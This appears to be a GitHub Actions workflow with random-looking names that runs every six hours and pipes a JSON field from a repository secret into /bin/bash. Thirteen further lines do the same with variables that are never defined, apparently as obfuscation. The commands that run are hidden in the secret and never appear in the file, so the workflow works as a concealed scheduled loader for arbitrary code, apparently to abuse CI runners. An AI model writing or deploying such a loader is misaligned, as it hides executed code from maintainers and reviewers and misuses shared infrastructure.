name: mingyulu1837

on:
  workflow_dispatch:
  schedule:
    - cron: '31 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mingyulu1837
        env:
          t3: ${{ secrets.t3 }}
        run: |
          echo $t3 | jq -r .pmo33988 | /bin/bash
          echo $jqe3 | jq -r .eqvho30666 | /bin/bash
          echo $lb86 | jq -r .x54122 | /bin/bash
          echo $gg7 | jq -r .rxct0 | /bin/bash
          echo $fr1 | jq -r .iz4958 | /bin/bash
          echo $quzpf5 | jq -r .mfepo41 | /bin/bash
          echo $yedj8 | jq -r .o975 | /bin/bash
          echo $ntkv0496 | jq -r .fgoc583 | /bin/bash
          echo $v94389 | jq -r .lr9 | /bin/bash
          echo $zwe4 | jq -r .qaa63707 | /bin/bash
          echo $j21508 | jq -r .we75363 | /bin/bash
          echo $vu6 | jq -r .l330 | /bin/bash
          echo $neo67645 | jq -r .h06 | /bin/bash
          echo $fstds0556 | jq -r .lq32 | /bin/bash

